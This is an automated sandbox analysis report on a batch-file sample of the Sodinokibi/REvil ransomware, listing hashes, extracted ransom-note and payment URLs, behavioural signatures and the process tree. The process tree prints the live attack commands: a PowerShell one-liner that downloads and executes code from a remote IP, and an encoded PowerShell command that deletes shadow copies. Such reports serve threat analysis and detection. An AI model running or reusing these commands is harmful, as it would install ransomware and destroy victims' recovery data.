Analysis
-
max time kernel
87s -
max time network
98s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
15-05-2020 20:10
Static task
static1
Behavioral task
behavioral1
Sample
d4a380d12c8f386aeaa2ab8a1f33067f.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
d4a380d12c8f386aeaa2ab8a1f33067f.bat
Resource
win10v200430
General
-
Target
d4a380d12c8f386aeaa2ab8a1f33067f.bat
-
Size
218B
-
MD5
67895090003d0e397d064545c799e1b7
-
SHA1
b1864fd30e1c39495ed72a9cdf4744446233cc4d
-
SHA256
3c3e7899e6b30a6296d9e7e6a4c25ac2bdd7aa646176afbea2c2dc5198c2874e
-
SHA512
3492801a8dda9940ad6fdc7d76d3bd876fa7bf0ed30a62b8113ae39f460eeb7d28ff3b1db77b8c9dc61880be1c2137c1c3e68be77f1f6101741e5054599458de
Malware Config
Extracted
http://185.103.242.78/pastes/d4a380d12c8f386aeaa2ab8a1f33067f
Extracted
C:\m4s23m-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/48B8DFF1F3BFE3B2
http://decryptor.cc/48B8DFF1F3BFE3B2
Signatures
-
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1296 wrote to memory of 1328 1296 cmd.exe powershell.exe PID 1328 wrote to memory of 556 1328 powershell.exe powershell.exe PID 1328 wrote to memory of 556 1328 powershell.exe powershell.exe PID 1328 wrote to memory of 556 1328 powershell.exe powershell.exe PID 1328 wrote to memory of 556 1328 powershell.exe powershell.exe -
Suspicious behavior: EnumeratesProcesses 77 IoCs
Processes:
powershell.exepowershell.exepid process 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 556 powershell.exe 556 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Drops file in Program Files directory 15 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\PushExit.eps powershell.exe File opened for modification \??\c:\program files\SuspendSync.aifc powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\m4s23m-readme.txt powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\m4s23m-readme.txt powershell.exe File created \??\c:\program files\m4s23m-readme.txt powershell.exe File opened for modification \??\c:\program files\AddSplit.png powershell.exe File opened for modification \??\c:\program files\LimitInstall.emf powershell.exe File opened for modification \??\c:\program files\ProtectUnblock.mpg powershell.exe File created \??\c:\program files (x86)\m4s23m-readme.txt powershell.exe File created \??\c:\program files\microsoft sql server compact edition\m4s23m-readme.txt powershell.exe File opened for modification \??\c:\program files\EnterEnable.mpv2 powershell.exe File opened for modification \??\c:\program files\ReceiveRestart.m4v powershell.exe File opened for modification \??\c:\program files\CheckpointNew.3gp powershell.exe File opened for modification \??\c:\program files\CompleteRepair.vbe powershell.exe File opened for modification \??\c:\program files\SkipRequest.raw powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\7q9buxi.bmp" powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1328 powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 1 1328 powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1328 powershell.exe Token: SeDebugPrivilege 1328 powershell.exe Token: SeDebugPrivilege 556 powershell.exe Token: SeBackupPrivilege 1836 vssvc.exe Token: SeRestorePrivilege 1836 vssvc.exe Token: SeAuditPrivilege 1836 vssvc.exe Token: SeTakeOwnershipPrivilege 1328 powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\d4a380d12c8f386aeaa2ab8a1f33067f.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1296 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/d4a380d12c8f386aeaa2ab8a1f33067f');Invoke-YRZYGKQZCZH;Start-Sleep -s 10000"2⤵
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Drops file in Program Files directory
- Sets desktop wallpaper using registry
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Blacklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:1328 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:556
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1836